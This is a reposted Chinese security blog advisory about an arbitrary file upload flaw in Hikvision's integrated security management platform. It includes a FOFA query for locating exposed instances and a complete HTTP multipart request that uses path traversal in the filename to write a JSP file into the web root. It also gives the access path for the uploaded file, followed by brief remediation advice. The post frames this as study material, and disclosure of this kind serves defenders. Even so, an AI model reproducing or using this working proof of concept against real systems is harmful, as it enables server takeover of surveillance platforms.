【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

admin 2023年8月20日23:21:35评论486 views字数 1274阅读4分14秒阅读模式
【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

0x00 团队声明

Disclaimer
【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC
该漏洞为我团队漏洞监测平台发现,仅供学习参考使用,请勿用作违法用途,否则后果自负。
【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

0x01 漏洞概述

Vulnerability Overview

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

漏洞编号:

海康威视(Hikvision)是一家总部位于中国杭州的公司,是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机,海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案,包括视频监控、入侵检测、访客管理、停车场管理等。

HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,获取服务器权限。

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

0x02 影响版本

Affected Versions
【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC
iVMS-8700 V2.0.0 - V2.9.2

②iSecure Center V1.0.0 - V1.7.0

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

0x03 漏洞复现

Vulnerability Reproduction
【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC
FOFA语法:app="HIKVISION-综合安防管理平台"

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

系统登录页面

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

源代码审计

WEB-INF/classes/com/hikvision/svm/controller/ExternalController.class

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

WEB-INF/classes/com/hikvision/svm/business/serivce/impl/ExternalBusinessServiceImpl.class

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

构造请上传文件 (通过 env泄漏获取绝对路径,路径一般不会修改)

POST /svm/api/external/report HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%out.print("test");%>
------WebKitFormBoundary9PggsiM755PLa54a--

通过BP验证

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

/portal/ui/login/..;/..;/new.jsp

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

0x04 整改意见

Remediation Suggestions
【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC
①升级到官方最新版本。
②通过WAF等设备添加规则。
③https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/2023-03/

【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

原文始发于微信公众号(小白嘿课):【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月20日23:21:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【严重】 2023 HW HiKVISION 综合安防管理平台0day漏洞原理与POChttp://cn-sec.com/archives/1958078.html

发表评论

匿名网友 填写信息